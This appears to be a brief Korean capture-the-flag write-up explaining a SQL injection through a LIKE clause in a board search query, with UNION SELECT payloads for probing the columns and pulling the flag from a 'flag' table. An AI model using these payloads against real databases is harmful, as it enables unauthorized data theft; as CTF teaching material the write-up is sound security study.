[Tutorial] hey! Watch it!

문제 개요

• LIKE 구문에 사용자 입력이 삽입되어 SQL Injection이 가능합니다.

취약점 분석

SELECT title, content FROM board WHERE title LIKE '%$title%';

익스플로잇 절차

1. 테이블 구조 탐색

   %' UNION SELECT 1,2 -- -

2. 정보 스키마 탐색

3. 플래그 추출

   %' UNION SELECT 0,flag FROM flag -- -

핵심 포인트

LIKE 주입 시 와일드카드와 따옴표 위치를 고려해야 합니다.